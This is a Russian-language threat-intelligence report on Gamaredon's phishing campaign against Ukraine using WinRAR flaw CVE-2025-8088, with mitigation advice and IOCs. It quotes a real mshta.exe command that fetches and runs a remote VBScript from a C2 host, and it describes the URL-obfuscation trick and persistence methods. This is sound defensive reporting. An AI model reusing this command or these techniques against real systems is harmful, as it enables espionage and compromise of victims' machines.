APT-группировка Gamaredon использует уязвимость WinRAR для атак на Украину

Группа, действующая с 2013 года традиционно фокусируется на целях в Украине. Её основными задачами являются хищение конфиденциальной информации и шпионаж. Несмотря на многократные публичные разоблачения её деятельности различными компаниями в сфере кибербезопасности, активность Gamaredon не только не снижается, но и демонстрирует тенденцию к усилению.

Новая волна атак была выявлена в ходе мониторинга в начале 2025 года. Атаки представляют собой целенаправленные фишинговые кампании. Внимание экспертов привлекло использование новой уязвимости, получившей идентификатор CVE-2025-8088. Эта уязвимость типа "path traversal" (переход по каталогам) позволяет злоумышленникам осуществлять запись файлов в произвольные системные каталоги при распаковке специально сформированного RAR-архива.

Механизм атаки начинается с отправки целевых фишинговых писем. В письмах содержатся вредоносные RAR-архивы. Архивы сконструированы таким образом, что в их файловом списке отображается только один безобидный файл-приманка. Однако внутри архива скрыты альтернативные потоки данных (Alternate Data Streams, ADS), содержащие вредоносную нагрузку.

Когда жертва пытается открыть или распаковать такой архив, уязвимость CVE-2025-8088 позволяет скрытно создать файл в системной папке автозагрузки Windows. Конкретно, в путь %userprofile%\appdata\roaming\microsoft\windows\start menu\programs\startup помещается файл с расширением .HTA. Помещение файла в эту папку обеспечивает его автоматический запуск при следующем входе пользователя в систему, что даёт злоумышленникам устойчивость (persistence) в скомпрометированной системе.

После перезагрузки компьютера или нового сеанса пользователя запускается HTA-файл. Этот файл выступает в роли загрузчика (downloader). Встроенный в него скрипт на языке VBScript запускает системную утилиту mshta.exe с параметром в виде URL-адреса. Команда заставляет систему обратиться к удалённому серверу командования и управления (Command and Control, C2), принадлежащему хакерам, и загрузить следующий этап атаки.

В ходе расследования был обнаружен пример такой команды: mshta.exe http://censor.net@open-files.sytes[.]net/GPuUkr/copiesDIB/sheetODy.pdf. Важно отметить, что файл sheetODy.pdf не является документом. На самом деле это замаскированный под PDF-документ скрипт VBScript, который немедленно исполняется. Использование синтаксиса "censor.net@" является попыткой затруднить анализ и обойти простые методы обнаружения, основанные на доменных именах.

Второй этап представляет собой сложный, многослойно зашифрованный VBScript-скрипт, который является основной вредоносной нагрузкой (payload) Gamaredon. Для обхода антивирусного ПО скрипт использует несколько уровней обфускации. К ним относятся замещение значимых строк бессмысленными переменными и применение сложных пользовательских функций для динамической сборки кода во время выполнения. Ключевые компоненты, такие как логика взаимодействия с C2 и код для следующего этапа, закодированы в формате Base64 и расшифровываются непосредственно перед исполнением.

После расшифровки и выполнения этот скрипт реализует полный набор функций для шпионажа. Он собирает информацию о системе, устанавливает связь с серверами управления и развёртывает дополнительные механизмы устойчивости. В частности, скрипт часто создаёт задание в Планировщике заданий Windows. Это задание, замаскированное под легитимную системную службу, обеспечивает постоянное присутствие зловреда в системе даже в случае удаления файла из папки автозагрузки.

Для коммуникации в скрипте жёстко прописан первичный домен C2. Однако, следуя своей тактике, Gamaredon обычно внедряет в код несколько резервных адресов. Это повышает устойчивость инфраструктуры и усложняет её блокировку.

Аналитики единодушно относят данную кампанию к Gamaredon. Атака демонстрирует классический для группы подход: комбинация свежей уязвимости для первоначального проникновения с отработанной годами цепочкой поставки вредоносных скриптов на VBScript. Каждый этап, от записи HTA-загрузчика через уязвимость до выполнения многослойного скрипта и создания задания в планировщике, несёт отчётливые черты методологии этой APT-группировки.

Для защиты от подобных угроз эксперты рекомендуют организациям: Во-первых, необходимо усилить защиту корпоративной почты, внедрив решения для фильтрации входящих сообщений, способные обнаруживать и блокировать фишинговые письма с опасными вложениями. Во-вторых, критически важно обновить все экземпляры WinRAR до последней версии, в которой уязвимость CVE-2025-8088 устранена. В-третьих, следует усилить мониторинг систем и сетей, уделяя особое внимание журналам событий Windows, изменениям в автозагрузке, реестре и запуску скриптовых интерпретаторов. Наконец, необходимо обеспечить актуальность антивирусного ПО на всех конечных точках и регулярно проводить проверки на наличие вредоносных программ.

IPv4

• 62.60.234.123
• 87.251.69.182

Domains

• 228w1mx7-80.usw3.devtunnels.ms
• 488c65e6d7175f5e696ece9711c0ec37.loophole.site
• books-drunk-typical-indirect.trycloudflare.com
• digitall.webhop.me
• open-files.sytes.net

MD5

• 0e39dee073166e011bc0f425caf9446e
• ae1e647eece735f631addb0731d3580b